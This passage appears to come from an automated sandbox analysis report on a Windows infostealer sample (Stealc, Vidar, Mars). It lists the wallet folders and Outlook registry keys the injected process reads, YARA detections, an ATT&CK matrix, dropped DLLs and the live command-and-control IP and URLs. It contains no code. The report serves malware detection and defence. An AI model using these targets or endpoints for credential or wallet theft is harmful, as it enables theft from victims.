                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                        Tries to steal Mail credentials (via file / registry access)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
                        Source: Yara matchFile source: 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7596, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected Mars stealer
                        Source: Yara matchFile source: 2.2.aspnet_regiis.exe.2750000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.aspnet_regiis.exe.2750000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc20000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Yara detected Stealc
                        Source: Yara matchFile source: 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7596, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Yara detected Vidar stealer
                        Source: Yara matchFile source: 2.2.aspnet_regiis.exe.2750000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.aspnet_regiis.exe.2750000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc20000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7596, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C490C40 sqlite3_bind_zeroblob,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C490D60 sqlite3_bind_parameter_name,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C3B8EA0 sqlite3_clear_bindings,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C490B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                        Native API                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		1
                        Disable or Modify Tools                        		2
                        OS Credential Dumping                        		2
                        System Time Discovery                        		Remote Services1
                        Archive Collected Data                        		12
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts511
                        Process Injection                        		1
                        Deobfuscate/Decode Files or Information                        		LSASS Memory1
                        Account Discovery                        		Remote Desktop Protocol4
                        Data from Local System                        		2
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                        Obfuscated Files or Information                        		Security Account Manager2
                        File and Directory Discovery                        		SMB/Windows Admin Shares1
                        Screen Capture                        		2
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                        Software Packing                        		NTDS144
                        System Information Discovery                        		Distributed Component Object Model1
                        Email Collection                        		112
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading                        		LSA Secrets121
                        Security Software Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Masquerading                        		Cached Domain Credentials131
                        Virtualization/Sandbox Evasion                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
                        Virtualization/Sandbox Evasion                        		DCSync12
                        Process Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job511
                        Process Injection                        		Proc Filesystem1
                        System Owner/User Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe38%ReversingLabsWin32.Trojan.Amadey
                        f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe35%VirustotalBrowse
                        f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Roaming\d3d9.dll100%Joe Sandbox ML
                        C:\ProgramData\freebl3.dll0%ReversingLabs
                        C:\ProgramData\mozglue.dll0%ReversingLabs
                        C:\ProgramData\msvcp140.dll0%ReversingLabs
                        C:\ProgramData\nss3.dll0%ReversingLabs
                        C:\ProgramData\softokn3.dll0%ReversingLabs
                        C:\ProgramData\vcruntime140.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Roaming\d3d9.dll79%ReversingLabsWin32.Trojan.LummaStealer

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                        https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                        http://23.88.106.134/6a9f8e2503d99c04.phpGS100%Avira URL Cloudmalware
                        http://23.88.106.134/6a9f8e2503d99c04.phpwser100%Avira URL Cloudmalware
                        http://23.88.106.134/566d6e1ec8db6394/softokn3.dllOV100%Avira URL Cloudmalware
                        https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF0%Avira URL Cloudsafe
                        https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                        http://23.88.1060%Avira URL Cloudsafe
                        https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                        http://23.88.106.134/6a9f8e2503d99c04.php100%Avira URL Cloudmalware
                        http://23.88.106.134/6a9f8e2503d99c04.phpC100%Avira URL Cloudmalware
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%Avira URL Cloudsafe
                        https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                        http://23.88.106.134/6a9f8e2503d99c04.php?S100%Avira URL Cloudmalware
                        http://23.88.106.134/6a9f8e2503d99c04.php13%VirustotalBrowse
                        http://23.88.106.134/566d6e1ec8db6394/nss3.dllj9100%Avira URL Cloudmalware
                        http://23.88.106.134/6a9f8e2503d99c04.phpm100%Avira URL Cloudmalware
                        http://23.88.106.134/566d6e1ec8db6394/nss3.dllpera100%Avira URL Cloudmalware
                        http://23.88.106.134/6a9f8e2503d99c04.phpiSS100%Avira URL Cloudmalware
                        http://23.88.106.134/566d6e1ec8db6394/sqlite3.dll100%Avira URL Cloudmalware
                        http://23.88.106.134/6a9f8e2503d99c04.phppenSSH100%Avira URL Cloudmalware
                        http://23.88.106.134/566d6e1ec8db6394/mozglue.dllAV100%Avira URL Cloudmalware
                        http://23.88.106.134/566d6e1ec8db6394/msvcp140.dll100%Avira URL Cloudmalware
                        http://23.88.106.134/6a9f8e2503d99c04.phpz100%Avira URL Cloudmalware
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe0%Avira URL Cloudsafe
                        http://23.88.106.134/566d6e1ec8db6394/msvcp140.dll12%VirustotalBrowse
                        http://23.88.106.134/6a9f8e2503d99c04.php513e43049a24c4f8a56ff24fb86a0b100%Avira URL Cloudmalware
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe0%Avira URL Cloudsafe
                        http://23.88.106.134/6a9f8e2503d99c04.phpition:100%Avira URL Cloudmalware
                        http://www.sqlite.org/copyright.html.0%Avira URL Cloudsafe
                        http://23.88.106.134y0%Avira URL Cloudsafe
                        http://www.mozilla.com/en-US/blocklist/0%Avira URL Cloudsafe
                        https://mozilla.org0/0%Avira URL Cloudsafe
                        http://www.sqlite.org/copyright.html.0%VirustotalBrowse
                        https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                        http://www.mozilla.com/en-US/blocklist/0%VirustotalBrowse
                        http://23.88.106.134/566d6e1ec8db6394/sqlite3.dll13%VirustotalBrowse
                        http://23.88.106.134/6a9f8e2503d99c04.phpdus.wallet100%Avira URL Cloudmalware
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                        http://23.88.106.134/566d6e1ec8db6394/softokn3.dll100%Avira URL Cloudmalware
                        https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%Avira URL Cloudsafe
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%VirustotalBrowse
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
                        https://www.ecosia.org/newtab/0%VirustotalBrowse
                        https://www.ecosia.org/newtab/0%Avira URL Cloudsafe
                        http://23.88.106.134/566d6e1ec8db6394/mozglue.dll12%VirustotalBrowse
                        http://23.88.106.134/566d6e1ec8db6394/mozglue.dll100%Avira URL Cloudmalware
                        http://23.88.106.134/566d6e1ec8db6394/freebl3.dllYW100%Avira URL Cloudmalware
                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%Avira URL Cloudsafe
                        http://23.88.106.134/566d6e1ec8db6394/softokn3.dll12%VirustotalBrowse
                        http://23.88.106.134/6a9f8e2503d99c04.php)100%Avira URL Cloudmalware
                        http://23.88.106.134/6a9f8e2503d99c04.phpcS100%Avira URL Cloudmalware
                        http://23.88.106.134/566d6e1ec8db6394/freebl3.dlleV100%Avira URL Cloudmalware
                        http://23.88.106.134/566d6e1ec8db6394/freebl3.dll100%Avira URL Cloudmalware
                        http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll3x100%Avira URL Cloudmalware
                        http://23.88.106.134/6a9f8e2503d99c04.phpition:12%VirustotalBrowse
                        http://23.88.106.134100%Avira URL Cloudmalware
                        http://23.88.106.134/566d6e1ec8db6394/nss3.dll100%Avira URL Cloudmalware
                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%VirustotalBrowse
                        http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll4100%Avira URL Cloudmalware
                        https://support.mozilla.org0%Avira URL Cloudsafe
                        http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll100%Avira URL Cloudmalware
                        http://23.88.106.134/6a9f8e2503d99c04.php6100%Avira URL Cloudmalware

                        Domains and IPs

                        Contacted Domains

                        No contacted domains info

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://23.88.106.134/6a9f8e2503d99c04.phptrue
                        • 13%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        		unknown
                        http://23.88.106.134/566d6e1ec8db6394/sqlite3.dlltrue
                        • 13%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        		unknown
                        http://23.88.106.134/566d6e1ec8db6394/msvcp140.dlltrue
                        • 12%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        		unknown
                        http://23.88.106.134/566d6e1ec8db6394/softokn3.dlltrue
                        • 12%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        		unknown
                        http://23.88.106.134/566d6e1ec8db6394/mozglue.dlltrue
                        • 12%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        		unknown
                        http://23.88.106.134/566d6e1ec8db6394/freebl3.dlltrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://23.88.106.134/566d6e1ec8db6394/nss3.dlltrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dlltrue
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://23.88.106.134/6a9f8e2503d99c04.phpGSaspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://23.88.106.134/6a9f8e2503d99c04.phpwseraspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://duckduckgo.com/chrome_newtabaspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFECAKKKKJDBKKFIEBKEHDGCAFCB.2.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://23.88.106.134/566d6e1ec8db6394/softokn3.dllOVaspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://duckduckgo.com/ac/?q=aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://23.88.106aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://23.88.106.134/6a9f8e2503d99c04.phpCaspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17aspnet_regiis.exe, 00000002.00000003.1726461054.0000000022DDD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://23.88.106.134/6a9f8e2503d99c04.php?Saspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://23.88.106.134/566d6e1ec8db6394/nss3.dllj9aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BD7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://23.88.106.134/6a9f8e2503d99c04.phpmaspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://23.88.106.134/566d6e1ec8db6394/nss3.dllperaaspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://23.88.106.134/6a9f8e2503d99c04.phpiSSaspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://23.88.106.134/6a9f8e2503d99c04.phppenSSHaspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchaspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://23.88.106.134/566d6e1ec8db6394/mozglue.dllAVaspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://23.88.106.134/6a9f8e2503d99c04.phpzaspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exeaspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://23.88.106.134/6a9f8e2503d99c04.php513e43049a24c4f8a56ff24fb86a0baspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exeaspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://23.88.106.134/6a9f8e2503d99c04.phpition:aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpfalse
                        • 12%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.sqlite.org/copyright.html.aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824142050.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://23.88.106.134yaspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.mozilla.com/en-US/blocklist/aspnet_regiis.exe, aspnet_regiis.exe, 00000002.00000002.1824348994.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://mozilla.org0/freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoaspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://23.88.106.134/6a9f8e2503d99c04.phpdus.walletaspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016aspnet_regiis.exe, 00000002.00000003.1726461054.0000000022DDD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.ecosia.org/newtab/aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://23.88.106.134/566d6e1ec8db6394/freebl3.dllYWaspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brECAKKKKJDBKKFIEBKEHDGCAFCB.2.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://23.88.106.134/6a9f8e2503d99c04.php)aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://ac.ecosia.org/autocomplete?q=aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://23.88.106.134/6a9f8e2503d99c04.phpcSaspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://23.88.106.134/566d6e1ec8db6394/freebl3.dlleVaspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll3xaspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://23.88.106.134aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll4aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://support.mozilla.orgECAKKKKJDBKKFIEBKEHDGCAFCB.2.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://23.88.106.134/6a9f8e2503d99c04.php6aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        23.88.106.134
                        		unknownUnited States
                        		18978ENZUINC-UStrue

                        General Information

                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1454088
                        Start date and time:2024-06-08 20:21:05 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 7m 17s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Cookbook file name:default.jbs
